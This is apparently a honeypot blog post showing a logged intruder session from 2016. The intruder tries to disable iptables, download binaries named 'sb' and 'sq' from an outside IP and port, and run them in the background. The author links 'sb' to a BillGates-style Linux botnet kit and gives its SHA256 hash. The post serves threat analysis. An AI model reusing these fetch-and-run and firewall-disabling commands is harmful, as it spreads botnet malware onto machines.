Copy&paste time!

20160915-201343-628.log

This is the same guy as seen in Copy&paste!

He must have pasted the commands from a web page or something, the >, < and & characters were written as &gt;, &lt; and &amp; in the terminal.

sb seems to be a kit that loads a kernel module called xpacket.ko. It looks a lot like the BillGates Linux Botnet.

The SHA256 sum of sb is 3e6a2e3d3e12048b7f75c75bbcbc64ec38ee094e0accac91ae178561b89a01da.

The programs included with the Debian GNU/Linux system are free software;                                                                                                                         [15/99202]
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

ubnt@svr02:~# service iptables stop
bash: service: command not found
ubnt@svr02:~# wget http://118.193.189.229:6552/sb
Sorry, SSL not supported in this release
ubnt@svr02:~# chmod 0755 /root/sb
chmod: cannot access /root/sb: No such file or directory
ubnt@svr02:~# nohup /root/sb > /dev/null 2>&1 &
nohup: ignoring input and appending output to `nohup.out'
ubnt@svr02:~# chmod 777 sb
chmod: cannot access sb: No such file or directory
ubnt@svr02:~# ./sb
bash: ./sb: command not found
ubnt@svr02:~# chmod 0755 /root/sb
chmod: cannot access /root/sb: No such file or directory
ubnt@svr02:~# nohup /root/sb &gt; /dev/null 2&gt;&amp;1 &amp;
nohup: ignoring input and appending output to `nohup.out'
bash: /dev/null: command not found
bash: &amp: command not found
bash: 1: command not found
ubnt@svr02:~# chmod 0777 sb
chmod: cannot access sb: No such file or directory
ubnt@svr02:~# chmod u+x sb
chmod: cannot access sb: No such file or directory
ubnt@svr02:~# ./sb &
bash: ./sb: command not found
ubnt@svr02:~# chmod u+x sb
chmod: cannot access sb: No such file or directory
ubnt@svr02:~# ./sb &
bash: ./sb: command not found
ubnt@svr02:~# cd /tmp
ubnt@svr02:/tmp# service iptables stop
bash: service: command not found
ubnt@svr02:/tmp# wget http://118.193.189.229:6552/sq
Sorry, SSL not supported in this release
ubnt@svr02:/tmp# chmod 0755 /root/sq
chmod: cannot access /root/sq: No such file or directory
ubnt@svr02:/tmp# nohup /root/sq > /dev/null 2>&1 &
nohup: ignoring input and appending output to `nohup.out'
ubnt@svr02:/tmp# chmod 777 sq
chmod: cannot access sq: No such file or directory
ubnt@svr02:/tmp# ./sq
bash: ./sq: command not found
ubnt@svr02:/tmp# chmod 0755 /root/sq
chmod: cannot access /root/sq: No such file or directory
ubnt@svr02:/tmp# nohup /root/sq &gt; /dev/null 2&gt;&amp;1 &amp;
nohup: ignoring input and appending output to `nohup.out'
bash: /dev/null: command not found
bash: &amp: command not found
bash: 1: command not found
ubnt@svr02:/tmp# chmod 0777 sq
chmod: cannot access sq: No such file or directory
ubnt@svr02:/tmp# chmod u+x sq
chmod: cannot access sq: No such file or directory
ubnt@svr02:/tmp# ./sq &
bash: ./sq: command not found
ubnt@svr02:/tmp# chmod u+x dos6cc4
chmod: cannot access dos6cc4: No such file or directory
ubnt@svr02:/tmp# 						

Toggle Menu